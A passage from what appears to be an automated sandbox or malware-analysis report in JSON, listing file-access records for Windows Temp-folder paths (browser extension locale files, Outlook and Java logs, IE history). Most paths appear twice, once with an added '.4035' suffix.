"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sv\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sv\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sv\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sr\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sr\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sr\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sr\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sl\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sl\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sl\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sl\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sk\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sk\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sk\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sk\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ru\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ru\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ru\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ru\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ro\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ro\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ro\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ro\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pt_PT\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_pt\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pt_PT\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_pt\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pt_BR\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_br\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pt_BR\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_br\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pl\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pl\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pl\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pl\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\no\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\no\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\no\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\no\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\nl\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\nl\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\nl\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\nl\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\lv\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lv\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\lv\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lv\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\lt\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lt\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\lt\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lt\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ko\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ko\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ko\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ko\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ja\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ja\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ja\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ja\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\it\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\it\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\it\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\it\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\id\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\id\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\id\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\id\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hu\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hu\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hu\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hu\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hr\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hr\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hr\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hr\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hi\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hi\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hi\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hi\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\he\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\he\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\he\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\he\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fr\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fr\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fr\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fr\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fil\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fil\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fil\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fil\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fi\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fi\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fi\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fi\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\es\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\es\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\es\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\es\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\en\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\en\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\en\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\en\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\el\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\el\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\el\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\el\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\de\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\de\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\de\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\de\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\da\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\da\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\da\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\da\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\cs\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\cs\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\cs\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\cs\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ca\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ca\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ca\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ca\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\bg\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\bg\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\bg\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\bg\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ar\\messages.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ar\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ar\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ar\\messages.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\outlook logging\\firstrun.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\outlook logging\\firstrun.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\outlook logging\\firstrun.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\outlook logging\\firstrun.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Low\\JavaDeployReg.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\low\\javadeployreg.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Low\\JavaDeployReg.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\low\\javadeployreg.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\\index.dat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\\index.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 